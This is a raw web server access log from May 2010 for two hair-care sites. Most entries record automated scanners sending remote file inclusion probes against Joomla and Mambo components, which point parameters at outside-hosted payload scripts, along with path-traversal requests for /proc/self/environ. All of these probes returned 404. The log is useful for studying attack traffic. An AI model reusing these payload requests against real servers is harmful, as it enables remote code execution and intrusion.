124.0.74.195 - - [17/May/2010:08:57:08 -0700] "GET /logs/access_100329.log//apa_phpinclude.inc.php?apa_module_basedir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:08:57:08 -0700] "GET /logs//apa_phpinclude.inc.php?apa_module_basedir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:08:57:12 -0700] "GET /logs/access_100405.log//apa_phpinclude.inc.php?apa_module_basedir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:08:38 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:08:38 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:08:38 -0700] "GET /logs/access_100503.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:08:53 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:08:53 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:08:53 -0700] "GET /logs/access_100503.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:09:25 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:09:32 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:12:06 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:12:06 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:12:06 -0700] "GET /logs/access_100201.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.112 - - [17/May/2010:09:13:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13118 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
218.149.84.14 - - [17/May/2010:09:15:39 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:15:39 -0700] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:09:15:39 -0700] "GET /logs/access_100201.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:09:18:32 -0700] "GET /logs//administrator/components/com_newsfeeds/admin.newsfeeds.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:09:18:32 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_newsfeeds/admin.newsfeeds.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:09:18:32 -0700] "GET /administrator/components/com_newsfeeds/admin.newsfeeds.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.131.78.107 - - [17/May/2010:09:24:14 -0700] "GET /stats/include/write.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.249.68.137 - - [17/May/2010:09:24:36 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:09:31:27 -0700] "GET /logs//includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:09:31:27 -0700] "GET /includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:09:31:27 -0700] "GET /logs/access_100222.log//includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.253.132.27 - - [17/May/2010:09:31:44 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.growlonghairfast.com"
67.210.111.35 - - [17/May/2010:09:35:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
67.210.111.35 - - [17/May/2010:09:35:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
188.40.72.10 - - [17/May/2010:09:35:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
188.40.72.10 - - [17/May/2010:09:35:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:09:36:00 -0700] "GET /logs/access_100222.log%20%20//includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.131.78.107 - - [17/May/2010:09:38:04 -0700] "GET /logs/access_100125.log/stats/include/write.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.131.78.107 - - [17/May/2010:09:38:04 -0700] "GET /stats/include/write.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.131.78.107 - - [17/May/2010:09:38:04 -0700] "GET /logs/stats/include/write.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.212.226.240 - - [17/May/2010:09:38:08 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "growlonghairfast.com"
91.212.226.240 - - [17/May/2010:09:38:08 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)" "growlonghairfast.com"
64.131.78.107 - - [17/May/2010:09:38:12 -0700] "GET /logs/access_091221.log/stats/include/write.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:09:38:34 -0700] "GET /logs/access_100412.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:09:38:34 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:09:38:34 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:38:35 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:38:35 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:38:35 -0700] "GET /logs/access.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:38:46 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:38:46 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:38:46 -0700] "GET /logs/access.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:09:38:56 -0700] "GET /logs/access_100412.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:09:38:56 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:09:38:57 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:09:39:14 -0700] "GET /logs/access_100322.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [17/May/2010:09:39:39 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "growlonghairfast.com"
91.212.226.210 - - [17/May/2010:09:39:39 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:39:55 -0700] "GET /logs/access_100510.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:40:14 -0700] "GET /logs/access_100510.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:12 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:13 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:14 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:14 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:16 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:16 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:44 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:44 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:42:44 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:01 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:01 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:01 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:16 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:24 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:37 -0700] "GET /logs/access.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:37 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:37 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:37 -0700] "GET /logs/access.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:37 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:43:37 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:44:00 -0700] "GET /logs/access_100510.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:44:02 -0700] "GET /logs/access_100510.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.111.35 - - [17/May/2010:09:44:39 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
67.210.111.35 - - [17/May/2010:09:44:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
67.210.111.35 - - [17/May/2010:09:44:40 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
67.210.111.35 - - [17/May/2010:09:44:45 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
67.210.111.35 - - [17/May/2010:09:44:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
67.210.111.35 - - [17/May/2010:09:44:45 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:48:19 -0700] "GET /logs/access.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:09:48:20 -0700] "GET /logs/access.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:09:48:45 -0700] "GET /logs/access_100322.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:09:48:51 -0700] "GET /includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:09:48:51 -0700] "GET /logs/access_100329.log//includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:09:48:51 -0700] "GET /logs//includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:09:49:04 -0700] "GET /logs/access_091116.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:09:49:06 -0700] "GET /logs/access_100329.log%20%20//includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.240 - - [17/May/2010:09:49:51 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "freehairsecrets.com"
91.212.226.210 - - [17/May/2010:09:49:51 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "freehairsecrets.com"
91.212.226.210 - - [17/May/2010:09:49:51 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "freehairsecrets.com"
91.212.226.240 - - [17/May/2010:09:49:51 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "freehairsecrets.com"
124.0.74.195 - - [17/May/2010:09:50:08 -0700] "GET /logs/access_100308.log%20%20//includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:09:50:51 -0700] "GET /logs/access_100315.log%20%20//includes/sef.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:10:02:23 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:10:02:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:10:02:24 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:10:02:24 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:10:02:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:10:02:24 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:10:06:31 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
188.40.72.10 - - [17/May/2010:10:06:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
188.40.72.10 - - [17/May/2010:10:06:32 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
188.40.72.10 - - [17/May/2010:10:06:32 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
188.40.72.10 - - [17/May/2010:10:06:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
188.40.72.10 - - [17/May/2010:10:06:33 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
61.67.201.187 - - [17/May/2010:10:14:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:14:29 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:14:32 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:15:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:15:08 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:15:09 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:15:19 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:15:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:15:20 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [17/May/2010:10:15:22 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
